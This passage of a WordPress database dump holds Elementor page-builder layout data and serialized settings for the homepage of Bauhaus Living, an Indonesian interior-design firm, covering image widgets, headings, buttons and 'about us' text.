flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4034,4895,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4035,4895,'_elementor_pro_version','3.8.1'),(4036,4895,'_elementor_css','a:6:{s:4:\"time\";i:1695374238;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4037,4896,'_wp_page_template','elementor_header_footer'),(4038,4896,'_elementor_edit_mode','builder'),(4039,4896,'_elementor_template_type','wp-page'),(4040,4896,'_elementor_version','3.8.1'),(4041,4896,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/reti